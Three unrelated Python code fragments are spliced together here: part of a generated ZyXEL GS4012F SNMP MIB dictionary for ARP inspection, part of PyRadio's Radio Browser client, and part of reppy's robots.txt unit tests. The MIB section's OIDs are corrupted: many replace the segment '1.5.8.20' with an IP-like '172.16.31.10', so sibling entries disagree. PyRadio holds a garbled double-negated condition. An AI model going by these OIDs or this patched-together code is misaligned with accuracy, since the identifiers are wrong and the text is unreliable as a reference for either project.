"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.4.1",
"status" : "current",
"linkage" : [
"arpInspectVlanVid",
],
"description" :
"""""",
}, # row
"arpInspectVlanVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.102.1.4.1.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "4094"
},
],
"range" : {
"min" : "1",
"max" : "4094"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectVlanLog" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.102.1.4.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"all" : {
"nodetype" : "namednumber",
"number" : "1"
},
"none" : {
"nodetype" : "namednumber",
"number" : "2"
},
"permit" : {
"nodetype" : "namednumber",
"number" : "3"
},
"deny" : {
"nodetype" : "namednumber",
"number" : "4"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"arpInspectVlanStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.4.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"enabled" : {
"nodetype" : "namednumber",
"number" : "1"
},
"disabled" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"arpInspectPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.5",
"status" : "current",
"description" :
"""""",
}, # table
"arpInspectPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.5.1",
"status" : "current",
"linkage" : [
"arpInspectPortIndex",
],
"description" :
"""""",
}, # row
"arpInspectPortIndex" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.5.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectPortTrust" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.5.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"trusted" : {
"nodetype" : "namednumber",
"number" : "1"
},
"untrusted" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"arpInspectPortRate" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.5.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "0",
"max" : "2048"
},
],
"range" : {
"min" : "0",
"max" : "2048"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"arpInspectPortInterval" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.1.5.1.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "15"
},
],
"range" : {
"min" : "1",
"max" : "15"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"arpInspectStatus" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.102.2",
}, # node
"arpInspectFilterClear" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"arpInspectLogClear" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"arpInspectFilterTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3",
"status" : "current",
"description" :
"""""",
}, # table
"arpInspectFilterEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3.1",
"create" : "true",
"status" : "current",
"linkage" : [
"arpInspectFilterMac",
"arpInspectFilterVid",
],
"description" :
"""""",
}, # row
"arpInspectFilterMac" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "MacAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectFilterVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "4094"
},
],
"range" : {
"min" : "1",
"max" : "4094"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectFilterPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectFilterExpiry" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectFilterReason" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3.1.5",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"macVid" : {
"nodetype" : "namednumber",
"number" : "1"
},
"port" : {
"nodetype" : "namednumber",
"number" : "2"
},
"ip" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectFilterRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.3.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"arpInspectLogTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4",
"status" : "current",
"description" :
"""""",
}, # table
"arpInspectLogEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4.1",
"status" : "current",
"linkage" : [
"arpInspectLogMac",
"arpInspectLogVid",
"arpInspectLogPort",
"arpInspectLogIp",
],
"description" :
"""""",
}, # row
"arpInspectLogMac" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "MacAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectLogVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Integer32",
"ranges" : [
{
"min" : "1",
"max" : "4094"
},
],
"range" : {
"min" : "1",
"max" : "4094"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectLogPort" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectLogIp" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectLogNumPkt" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectLogTime" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.4.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "DateAndTime"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"arpInspectStatisticsTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.102.2.5",
"status" : "current",
"description" :
"""""",
}, # table
"arpInspectStatisticsEntry" : | |
# -*- coding: utf-8 -*-
import curses
try:
from dns import resolver
except ImportError:
pass
from copy import deepcopy
import random
import json
import collections
from operator import itemgetter
try:
import requests
except ImportError:
pass
import threading
import logging
from .player import info_dict_to_list
from .cjkwrap import cjklen, PY3
from .countries import countries
from .simple_curses_widgets import SimpleCursesLineEdit, SimpleCursesHorizontalPushButtons, SimpleCursesWidgetColumns, SimpleCursesCheckBox
import locale
locale.setlocale(locale.LC_ALL, '') # set your locale
logger = logging.getLogger(__name__)
def country_from_server(a_server):
if a_server:
country = a_server.split('.')[0]
up = country[:-1].upper()
if up in countries.keys():
return countries[up]
else:
return country
else:
return None
def capitalize_comma_separated_string(a_string):
sp = a_string.split(',')
for i, n in enumerate(sp):
sp[i] = n.strip().capitalize()
return ', '.join(sp)
class PyRadioStationsBrowser(object):
''' A base class to get results from online radio directory services.
Actual implementations should be subclasses of this one.
'''
BASE_URL = ''
TITLE = ''
_parent = _outer_parent = None
_raw_stations = []
_last_search = None
_internal_header_height = 0
_url_timeout = 3
_search_timeout = 3
_vote_callback = None
_sort = _sort_win = None
# Normally outer boddy (holding box, header, internal header) is
# 2 chars wider that the internal body (holding the stations)
# This property value is half the difference (normally 2 / 2 = 1)
# Used to chgat the columns' separators in internal body
# Check if the cursor is divided as required and adjust
_outer_internal_body_diff = 2
_outer_internal_body_half_diff = 1
def __init__(self,
config,
config_encoding,
session=None,
search=None,
pyradio_info=None,
search_return_function=None,
message_function=None):
''' Initialize the station's browser.
It should return a valid search result (for example,
www.radio-browser.info implementation, returns 100 stations
sorted by number of votes).
Parameters
----------
search
Search parameters to be used instead of the default.
'''
pass
@property
def parent(self):
return self._parent
@parent.setter
def parent(self, val):
self._parent = val
if self._sort:
self._sort._parent = val
@property
def outer_parent(self):
return self._outer_parent
@outer_parent.setter
def outer_parent(self, val):
self._outer_parent = val
if self._sort_win:
self._sort_win._parent = val
@property
def outer_internal_body_half_diff(self):
return self._outer_internal_body_half_diff
@outer_internal_body_half_diff.setter
def outer_internal_body_half_diff(self, value):
raise ValueError('property is read only')
@property
def internal_header_height(self):
return self._internal_header_height
@internal_header_height.setter
def internal_header_height(self, value):
raise ValueError('property is read only')
@property
def title(self):
return self.TITLE
@title.setter
def title(self, value):
self.TITLE = value
@property
def vote_callback(self):
return self._vote_callback
@vote_callback.setter
def vote_callback(self, val):
self._vote_callback = val
def stations(self, playlist_format=1):
return []
def url(self, id_in_list):
''' Return a station's real/playable url
It has to be implemented only in case have_to_retrieve_url is True
Parameters
----------
id_in_list
id in list of stations (0..len-1)
Returns
-------
Real/playable url or '' if failed (string)
'''
return ''
def set_played(self, id_in_list, played):
''' Note that a player has been played.
Parameters
----------
id_in_list
id in list of stations (0..len-1)
played
True or False
'''
pass
def search(self, go_back_in_history=True):
return []
def set_encoding(self, id_in_list, new_encoding):
return
def format_station_line(self, id_in_list, pad, width):
return ''
def click(self, a_station):
pass
def vote(self, a_station):
pass
class RadioBrowserInfo(PyRadioStationsBrowser):
BASE_URL = 'api.radio-browser.info'
TITLE = 'Radio Browser '
_headers = {'User-Agent': 'PyRadio/dev',
'Content-Type': 'application/json'}
_raw_stations = []
# the output format to use based on window width
# Default value: -1
# Possible values: 0..5
# Look at format_station_line() for info
_output_format = -1
_info_len = []
_info_name_len = 0
_raw_stations = []
_internal_header_height = 1
_search_history = []
_search_history_index = -1
_columns_width = {
'votes': 7,
'clickcount': 7,
'bitrate': 7,
'country': 18,
'language': 15,
'state': 18,
'tags': 20,
'codec': 5
}
_server_selection_window = None
_dns_info = None
search_by = _old_search_by = None
keyboard_handler = None
def __init__(self,
config,
config_encoding,
session=None,
search=None,
pyradio_info=None,
search_return_function=None,
message_function=None):
'''
When first_search is True, it means that we are opening
the browser. If empty result is returned by the first
browser search, we show an empty stations' list.
if it is False and an empty result is returned by the first
browser search, which means we are already in the browser's
search screen, we just display the 'no result message'.
All of this is done at radio.py
'''
self.first_search = True
self._cnf = config
if session:
self._session = session
else:
self._session = requests.Session()
self._pyradio_info = pyradio_info.strip()
if self._pyradio_info:
self._headers['User-Agent'] = self._pyradio_info.replace(' ', '/')
self._config_encoding = config_encoding
self._message_function = message_function
self._search_return_function = search_return_function
def initialize(self):
self._dns_info = RadioBrowserInfoDns()
self._server = self._dns_info.give_me_a_server_url()
if logger.isEnabledFor(logging.INFO):
logger.info('random server is ' + self._server)
if self._server:
self._get_title()
self._search_history.append({
'type': 'topvote',
'term': '100',
'post_data': None,
})
self._search_history.append({
'type': 'bytagexact',
'term': 'big band',
'post_data': {'order': 'votes', 'reverse': 'true'},
})
self._search_history.append({
'type': 'search',
'term': '',
'post_data': {'name': 'jaz'},
})
self._search_history_index = 0
return True
return False
@property
def server(self):
return self._server
@property
def add_to_title(self):
return self._server.split('.')[0]
def _get_title(self):
self.TITLE = 'Radio Browser ({})'.format(country_from_server(self._server))
def stations(self, playlist_format=1):
''' Return stations' list (in PyRadio playlist format)
Parameters
----------
playlist_format
0: station name, url
1: station name, url, encoding
2: station name, url, encoding, browser flag (default)
'''
ret = []
for n in self._raw_stations:
if playlist_format == 0:
ret.append([n['name'], n['url']])
elif playlist_format == 1:
enc = '' if n['encoding'] == self._config_encoding else n['encoding']
ret.append([n['name'], n['url'], enc])
else:
enc = '' if n['encoding'] == self._config_encoding else n['encoding']
ret.append([n['name'], n['url'], enc, ''])
return ret
def url(self, id_in_list):
''' Get a station's url using resolved_url
Parameters
----------
id_in_list
id in list of stations (0..len-1)
Returns
-------
url or '' if failed
'''
if self._raw_stations:
if id_in_list < len(self._raw_stations):
if self._raw_stations[id_in_list]['url_resolved']:
return self._raw_stations[id_in_list]['url_resolved']
else:
return self._raw_stations[id_in_list]['url']
return ''
def click(self, a_station):
def do_click(a_station_uuid):
url = 'http://' + self._server + '/json/url/' + a_station_uuid
try:
r = self._session.get(url=url, headers=self._headers, timeout=(self._search_timeout, 2 * self._search_timeout))
if logger.isEnabledFor(logging.DEBUG):
logger.debug('Station click result: "{}"'.format(r.text))
except:
if logger.isEnabledFor(logging.DEBUG):
logger.debug('Station click failed...')
threading.Thread(target=do_click, args=(self._raw_stations[a_station]['stationuuid'], )).start()
def vote(self, a_station):
url = 'http://' + self._server + '/json/vote/' + self._raw_stations[a_station]['stationuuid']
if logger.isEnabledFor(logging.DEBUG):
logger.debug('Voting for: {}'.format(self._raw_stations[a_station]))
logger.debug('Voting url: ' + url)
try:
r = self._session.get(url=url, headers=self._headers, timeout=(self._search_timeout, 2 * self._search_timeout))
message = json.loads(r.text)
self.vote_result = self._raw_stations[a_station]['name'], message['message'][0].upper() + message['message'][1:]
if logger.isEnabledFor(logging.DEBUG):
logger.debug('Voting result: "{}"'.format(message))
except:
if logger.isEnabledFor(logging.DEBUG):
logger.debug('Station voting failed...')
self.vote_result = self._raw_stations[a_station]['name'], 'Voting for station failed'
if self._vote_callback:
self._vote_callback()
def get_info_string(self, a_station, max_width=60):
guide = [
('Name', 'name'),
('URL', 'url'),
('Resolved URL', 'url_resolved'),
('Website', 'homepage'),
('Tags', 'tags'),
('Votes', 'votes'),
('Clicks', 'clickcount'),
('Country', 'country'),
('State', 'state'),
('Language', 'language'),
('Bitrate', 'bitrate'),
('Codec', 'codec')
]
if self._raw_stations[a_station]['url'] == self._raw_stations[a_station]['url_resolved']:
guide.pop(2)
info = collections.OrderedDict()
for n in guide:
info[n[0]] = str(self._raw_stations[a_station][n[1]])
if n[1] == 'bitrate':
info[n[0]] += ' kb/s'
a_list = []
fix_highlight = []
a_list = info_dict_to_list(info, fix_highlight, max_width)
ret = '|' + '\n|'.join(a_list)
# logger.error('DE \n\n{}\n\n'.format(ret))
sp = ret.split('\n')
wrong_wrap = -1
for i, n in enumerate(sp):
# logger.exception('DE {0}: "{1}"'.format(i, n))
if wrong_wrap == i:
sp[i] = n.replace('|', '')
sp[i-1] += sp[i].replace('_', '')
sp[i] = '*' + sp[i]
wrong_wrap = -1
else:
if ': ' not in n:
sp[i] = n[1:]
if n[-1] == ':':
''' wrong wrapping! '''
wrong_wrap = i + 1
sp[i] += '|'
if sp[i][-1] != ' ':
sp[i] += ' '
if sp[i][0] != '|':
sp[i] = '|' + sp[i]
for i, n in enumerate(sp):
if n[0] == '*':
sp.pop(i)
ret = '\n'.join(sp).replace(': |', ':| ').replace(': ', ':| ')
# logger.error('DE \n\n{}\n\n'.format(ret))
return ret, ''
def search(self, go_back_in_history=True):
''' Search for stations with parameters.
Result is limited to 100 stations by default (use the
'limit' parameter to change it).
Parameters
----------
data
A dictionary containing the fields described at
http://www.radio-browser.info/webservice/#Advanced_station_search
Returns
-------
self._raw_stations
A dictionary with a subset of returned station data.
Its format is:
name : station name
id : station id
url : station url
resolved_url : station resolved_url
tags : starion tags
bitrate : station bitrate
hls : HLS status
votes : station votes
clickcount : station clicks
country : station country
state : statiob state
language : station language
codec : station codec
encoding : station encoding ('' means utf-8)
'''
if self._message_function:
self._message_function()
self.search_by = self._old_search_by = None
self._get_search_elements(
self._search_history[self._search_history_index]
)
self._old_search_by = self.search_by
self._sort = None
url = self._format_url(self._search_history[self._search_history_index])
post_data = {}
if self._search_history[self._search_history_index]['post_data']:
post_data = deepcopy(self._search_history[self._search_history_index]['post_data'])
self._output_format = -1
if self._search_type > 0:
if 'limit' not in post_data.keys():
post_data['limit'] = 100
if not 'hidebroken' not in post_data.keys():
post_data['hidebroken'] = True
if logger.isEnabledFor(logging.DEBUG):
logger.debug(' | |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
'''Tests cribbed from linkscape/processing/test/robotstxt.test.old.cc'''
import unittest
import reppy
import logging
from reppy import Utility
reppy.logger.setLevel(logging.FATAL)
MYNAME = 'rogerbot'
class TestOldMozscape(unittest.TestCase):
@staticmethod
def parse(strng):
'''Helper to parse a string as a Rules object'''
return reppy.parser.Rules('http://example.com/robots.txt', 200, strng, 0)
def test_wwwseomozorg(self):
robots_txt = ( "../resources.test/rep/www.seomoz.org\n"
"User-agent: *\n"
"Disallow: /blogdetail.php?ID=537\n"
"Disallow: /tracker\n"
"\n"
"Sitemap: http://www.seomoz.org/sitemap.xml.gz\n"
"Sitemap: http://files.wistia.com/sitemaps/seomoz_video_sitemap.xml\n" )
rules = self.parse(robots_txt)
# Basic functionality, and lack of case sensitivity.
for agent in [ 'reppy', 'rEpPy' ]:
self.assertTrue(rules.allowed("/blog", agent))
self.assertFalse(rules.allowed("/blogdetail.php?ID=537", agent))
self.assertFalse(rules.allowed("/tracker", agent))
def test_allowall(self):
rules = self.parse("User-agent: *\nDisallow:")
for agent in [ "reppy", "oijsdofijsdofijsodifj" ]:
self.assertTrue(rules.allowed("/", agent))
self.assertTrue(rules.allowed("/foo", agent))
self.assertTrue(rules.allowed("/foo.html", agent))
self.assertTrue(rules.allowed("/foo/bar", agent))
self.assertTrue(rules.allowed("/foo/bar.html", agent))
def test_disallowall(self):
rules = self.parse("User-agent: *\nDisallow: /\n")
for agent in [ "reppy", "oijsdofijsdofijsodifj" ]:
self.assertFalse(rules.allowed("/", agent))
self.assertFalse(rules.allowed("/foo", agent))
self.assertFalse(rules.allowed("/foo.html", agent))
self.assertFalse(rules.allowed("/foo/bar", agent))
self.assertFalse(rules.allowed("/foo/bar.html", agent))
def test_no_googlebot_folder(self):
robots_txt = ( "User-agent: Googlebot\n"
"Disallow: /no-google/\n" )
rules = self.parse(robots_txt)
self.assertFalse(rules.allowed("/no-google/", "googlebot"))
self.assertFalse(rules.allowed("/no-google/something", "googlebot"))
self.assertFalse(rules.allowed("/no-google/something.html", "googlebot"))
self.assertTrue(rules.allowed("/", "googlebot"))
self.assertTrue(rules.allowed("/somethingelse", "googlebot"))
def test_no_googlebot_file(self):
robots_txt = ( "User-agent: Googlebot\n"
"Disallow: /no-google/blocked-page.html\n" )
rules = self.parse(robots_txt)
self.assertFalse(rules.allowed("/no-google/blocked-page.html", "googlebot"))
self.assertTrue(rules.allowed("/", "googlebot"))
self.assertTrue(rules.allowed("/no-google", "googlebot"))
self.assertTrue(rules.allowed("/no-google/someotherfolder", "googlebot"))
self.assertTrue(rules.allowed("/no-google/someotherfolder/somefile", "googlebot"))
def test_rogerbot_only(self):
robots_txt = ( "User-agent: *\n"
"Disallow: /no-bots/block-all-bots-except-rogerbot-page.html \t\t\t\t\n"
"\n"
"User-agent: rogerbot\n"
"Allow: /no-bots/block-all-bots-except-rogerbot-page.html\n" )
rules = self.parse(robots_txt)
self.assertFalse(rules.allowed("/no-bots/block-all-bots-except-rogerbot-page.html", "notroger"))
self.assertTrue(rules.allowed("/", "notroger"))
self.assertTrue(rules.allowed("/no-bots/block-all-bots-except-rogerbot-page.html", "rogerbot"))
self.assertTrue(rules.allowed("/", "rogerbot"))
def test_allow_certain_pages_only(self):
robots_txt = ( "User-agent: *\n"
"Allow: /onepage.html\n"
"Allow: /oneotherpage.php\n"
"Disallow: /\n"
"Allow: /subfolder/page1.html\n"
"Allow: /subfolder/page2.php\n"
"Disallow: /subfolder/\n" )
rules = self.parse(robots_txt)
self.assertFalse(rules.allowed("/", "reppy"))
self.assertFalse(rules.allowed("/foo", "reppy"))
self.assertFalse(rules.allowed("/bar.html", "reppy"))
self.assertTrue(rules.allowed("/onepage.html", "reppy"))
self.assertTrue(rules.allowed("/oneotherpage.php", "reppy"))
self.assertFalse(rules.allowed("/subfolder", "reppy"))
self.assertFalse(rules.allowed("/subfolder/", "reppy"))
self.assertFalse(rules.allowed("/subfolder/aaaaa", "reppy"))
self.assertTrue(rules.allowed("/subfolder/page1.html", "reppy"))
self.assertTrue(rules.allowed("/subfolder/page2.php", "reppy"))
def test_no_gifs_or_jpgs(self):
robots_txt = ( "User-agent: *\n"
"Disallow: /*.gif$\n"
"Disallow: /*.jpg$\n" )
rules = self.parse(robots_txt)
self.assertTrue(rules.allowed("/", "reppy"))
self.assertTrue(rules.allowed("/foo", "reppy"))
self.assertTrue(rules.allowed("/foo.html", "reppy"))
self.assertTrue(rules.allowed("/foo/bar", "reppy"))
self.assertTrue(rules.allowed("/foo/bar.html", "reppy"))
self.assertFalse(rules.allowed("/test.jpg", "reppy"))
self.assertFalse(rules.allowed("/foo/test.jpg", "reppy"))
self.assertFalse(rules.allowed("/foo/bar/test.jpg", "reppy"))
self.assertTrue(rules.allowed("/the-jpg-extension-is-awesome.html", "reppy"))
# Edge cases where the wildcard could match in multiple places
self.assertFalse(rules.allowed("/jpg.jpg", "reppy"))
self.assertFalse(rules.allowed("/foojpg.jpg", "reppy"))
self.assertFalse(rules.allowed("/bar/foojpg.jpg", "reppy"))
self.assertFalse(rules.allowed("/.jpg.jpg", "reppy"))
self.assertFalse(rules.allowed("/.jpg/.jpg", "reppy"))
self.assertFalse(rules.allowed("/test.gif", "reppy"))
self.assertFalse(rules.allowed("/foo/test.gif", "reppy"))
self.assertFalse(rules.allowed("/foo/bar/test.gif", "reppy"))
self.assertTrue(rules.allowed("/the-gif-extension-is-awesome.html", "reppy"))
def test_block_subdirectory_wildcard(self):
robots_txt = ( "User-agent: *\n"
"Disallow: /private*/\n" )
rules = self.parse(robots_txt)
self.assertTrue(rules.allowed("/", "reppy"))
self.assertTrue(rules.allowed("/foo", "reppy"))
self.assertTrue(rules.allowed("/foo.html", "reppy"))
self.assertTrue(rules.allowed("/foo/bar", "reppy"))
self.assertTrue(rules.allowed("/foo/bar.html", "reppy"))
# Disallow clause ends with a slash, so these shouldn't match
self.assertTrue(rules.allowed("/private", "reppy"))
self.assertTrue(rules.allowed("/privates", "reppy"))
self.assertTrue(rules.allowed("/privatedir", "reppy"))
self.assertFalse(rules.allowed("/private/", "reppy"))
self.assertFalse(rules.allowed("/private/foo", "reppy"))
self.assertFalse(rules.allowed("/private/foo/bar.html", "reppy"))
self.assertFalse(rules.allowed("/privates/", "reppy"))
self.assertFalse(rules.allowed("/privates/foo", "reppy"))
self.assertFalse(rules.allowed("/privates/foo/bar.html", "reppy"))
self.assertFalse(rules.allowed("/privatedir/", "reppy"))
self.assertFalse(rules.allowed("/privatedir/foo", "reppy"))
self.assertFalse(rules.allowed("/privatedir/foo/bar.html", "reppy"))
def test_block_urls_with_question_marks(self):
robots_txt = ( "User-agent: *\n"
"Disallow: /*?\n" )
rules = self.parse(robots_txt)
self.assertTrue(rules.allowed("/", "reppy"))
self.assertTrue(rules.allowed("/foo", "reppy"))
self.assertTrue(rules.allowed("/foo.html", "reppy"))
self.assertTrue(rules.allowed("/foo/bar", "reppy"))
self.assertTrue(rules.allowed("/foo/bar.html", "reppy"))
self.assertFalse(rules.allowed("/?", "reppy"))
self.assertFalse(rules.allowed("/foo?q=param", "reppy"))
self.assertFalse(rules.allowed("/foo.html?q=param", "reppy"))
self.assertFalse(rules.allowed("/foo/bar?q=param", "reppy"))
self.assertFalse(rules.allowed("/foo/bar.html?q=param&bar=baz", "reppy"))
def test_no_question_marks_except_at_end(self):
robots_txt = ( "User-agent: *\n"
"Allow: /*?$\n"
"Disallow: /*?\n" )
rules = self.parse(robots_txt)
self.assertTrue(rules.allowed("/", "reppy"))
self.assertTrue(rules.allowed("/foo", "reppy"))
self.assertTrue(rules.allowed("/foo.html", "reppy"))
self.assertTrue(rules.allowed("/foo/bar", "reppy"))
self.assertTrue(rules.allowed("/foo/bar.html", "reppy"))
self.assertTrue(rules.allowed("/?", "reppy"))
self.assertTrue(rules.allowed("/foo/bar.html?", "reppy"))
self.assertFalse(rules.allowed("/foo?q=param", "reppy"))
self.assertFalse(rules.allowed("/foo.html?q=param", "reppy"))
self.assertFalse(rules.allowed("/foo/bar?q=param", "reppy"))
self.assertFalse(rules.allowed("/foo/bar.html?q=param&bar=baz", "reppy"))
def test_wildcard_edge_cases(self):
robots_txt = ( "User-agent: *\n"
"Disallow: /*one\n"
"Disallow: /two*three\n"
"Disallow: /irrelevant/four*five\n"
"Disallow: /six*\n"
"Disallow: /foo/*/seven*/eight*nine\n"
"Disallow: /foo/*/*ten$\n"
"\n"
"Disallow: /*products/default.aspx\n"
"Disallow: /*/feed/$\n" )
rules = self.parse(robots_txt)
self.assertTrue(rules.allowed("/", "reppy"))
self.assertTrue(rules.allowed("/foo", "reppy"))
self.assertTrue(rules.allowed("/foo.html", "reppy"))
self.assertTrue(rules.allowed("/foo/bar", "reppy"))
self.assertTrue(rules.allowed("/foo/bar.html", "reppy"))
self.assertFalse(rules.allowed("/one", "reppy"))
self.assertFalse(rules.allowed("/aaaone", "reppy"))
self.assertFalse(rules.allowed("/aaaaoneaaa", "reppy"))
self.assertFalse(rules.allowed("/oneaaaa", "reppy"))
self.assertFalse(rules.allowed("/twothree", "reppy"))
self.assertFalse(rules.allowed("/twoaaathree", "reppy"))
self.assertFalse(rules.allowed("/twoaaaathreeaaa", "reppy"))
self.assertFalse(rules.allowed("/twothreeaaa", "reppy"))
self.assertFalse(rules.allowed("/irrelevant/fourfive", "reppy"))
self.assertFalse(rules.allowed("/irrelevant/fouraaaafive", "reppy"))
self.assertFalse(rules.allowed("/irrelevant/fouraaafiveaaaa", "reppy"))
self.assertFalse(rules.allowed("/irrelevant/fourfiveaaa", "reppy"))
self.assertFalse(rules.allowed("/six", "reppy"))
self.assertFalse(rules.allowed("/sixaaaa", "reppy"))
self.assertFalse(rules.allowed("/products/default.aspx", "reppy"))
self.assertFalse(rules.allowed("/author/admin/feed/", "reppy"))
def test_allow_edge_cases(self):
robots_txt = ( "User-agent: *\n"
"Disallow:\t/somereallylongfolder/\n"
"Allow:\t\t/*.jpg\n"
"\n"
"Disallow:\t/sales-secrets.php\n"
"Allow: \t\t/sales-secrets.php\n"
"\n"
"Disallow:\t/folder\n"
"Allow:\t\t/folder/\n"
"\n"
"Allow:\t\t/folder2\n"
